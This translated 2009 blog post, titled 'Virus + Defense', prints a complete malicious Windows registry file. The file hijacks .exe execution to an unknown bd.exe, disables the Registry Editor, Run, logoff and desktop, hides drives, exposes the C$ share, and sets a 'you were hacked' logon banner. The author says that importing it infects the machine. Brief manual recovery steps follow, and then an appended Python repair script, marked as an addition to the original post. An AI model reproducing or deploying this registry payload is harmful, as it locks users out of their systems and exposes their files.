
Virus + Defense

藍脃兲涳 2009-08-07
Posting a registry virus + defense (2009-05-23 16:50:03)

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
""="c:\\windows\\bd.exe"

[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
""="c:\\windows\\xm.ico"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"NoDrives"=dword:FFFFFFFF

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NotrayContextMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoChangeStartMenu"=dword:00000001
"NoStartMenuMFUprogramslist"=dword:00000001
"NoDesktop"=dword:00000001
"NoDispAppearancePage"=dword:00000001
"NoLogOff"=dword:00000001
"NoRecentDocsMenu"=dword:00000001
"NoSetFolders"=dword:00000001
"NoRun"=dword:00000001
"NoClose"=dword:00000001
"NoViewContextMenu"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\]
""="txtfile"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ScanRegistry"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"=999

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"LegalNoticeCaption"="你的電腦被飛劍吹雪黑了  QQ:784161329"
"LegalNoticeText"="別人笑我太瘋癲,我笑他人看不穿"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\CDFS]
"Prefetch"=dword:00 00 09 00
"CacheSize"=dword:AC 09 00 00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"IPEnableRouter"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSetTaskbar"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoSaveSettings"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000001
"NoRealMode"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoBrowserContextMenu"=dword:00000001
"NoBrowserOptions"=dword:00000001
"NoBrowserSaveAs"=dword:00000001
"NoFileOpen"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Advanced"=dword:00000001
"Cache Internet"=dword:00000001
"AutoConfig"=dword:00000001
"HomePage"=dword:00000001
"History"=dword:00000001
"Connwiz Admin Lock"=dword:00000001
"SecurityTab"=dword:00000001
"ResetWebSettings"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]
"NoAddingSubScriptions"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFileMenu"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C$]
"Flags"=dword:302
"Type"=dword:00000000
"Path"="C:\\"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://blog.sina.com.cn/zhaoqiangpersonal"
"Window Title"="飛劍吹雪歡迎你"

 

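Save the above as a .reg file; importing it into the registry infects the machine. (Of course, it is usually imported by a purpose-written program. I don't do bad things, heh~~~~)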

 

What if you have been infected? Symptoms: the Registry Editor won't open, programs cannot run, Task Manager won't open ... too many to list.

 

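1. If the registry can still be imported into, i.e. double-clicking a .reg file still imports it into the registry, change the corresponding registry values back.

For example: "NoLogOff"=dword:00000001 disables logging off; we change it to "NoLogOff"=dword:00000000 and then import it into the registry.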

 

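2. The registry cannot be imported into at all

Download OD, and write a registry-modifying program that re-enables Run, the Registry Editor, and so on.

This is needed because viruses generally infect exe handling, i.e. they modify the value after exefile=, so exe files can no longer be run.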

 

We choose OD under "Open with", then press F9 to run, and the block is lifted.
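For case 1 above, flipping each value back by hand is error-prone, so here is an added example (not part of the original post) that parses a .reg file, reports the hijacked file associations and non-zero policy locks, and writes the repair .reg to import. The names `parse_reg` and `remediate` are hypothetical, the sample input is constructed, and the two association defaults are the standard Windows values.

```python
import re

# Constructed sample in the same format as the .reg file shown above.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="c:\\windows\\bd.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLogOff"=dword:00000001
"NoRun"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\]
@="txtfile"
'''

# Windows defaults for the two hijacked file associations (.reg-escaped form).
DEFAULTS = {
    r'\exefile\shell\open\command': r'"\"%1\" %*"',
    r'\.reg': '"regfile"',
}
NONZERO_DWORD = re.compile(r'dword:0*[1-9a-f][0-9a-f]*', re.IGNORECASE)

def parse_reg(text):
    """Yield (key, name, data) for every value line; '""' is treated as '@'."""
    key = None
    for line in map(str.strip, text.splitlines()):
        if m := re.fullmatch(r'\[(.+?)\\?\]', line):
            key = m.group(1)
        elif key and (m := re.fullmatch(r'(@|"[^"]*")=(.*)', line)):
            yield key, '@' if m.group(1) == '""' else m.group(1), m.group(2)

def remediate(text):
    """Return (findings, repair .reg text) undoing hijacks and policy locks."""
    findings, out = [], ['Windows Registry Editor Version 5.00']
    for key, name, data in parse_reg(text):
        low, fix = key.lower(), None
        if name == '@':
            fix = next((good for suffix, good in DEFAULTS.items()
                        if low.endswith(suffix) and data != good), None)
        elif '\\policies\\' in low and NONZERO_DWORD.fullmatch(data):
            fix = 'dword:00000000'  # the page's approach: flip 1 back to 0
        if fix:
            findings.append((key, name, data))
            out += ['', f'[{key}]', f'{name}={fix}']
    return findings, '\n'.join(out) + '\n'
```

Running `remediate` on its own output returns no findings, which is a quick way to confirm the repair file is clean before importing it.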
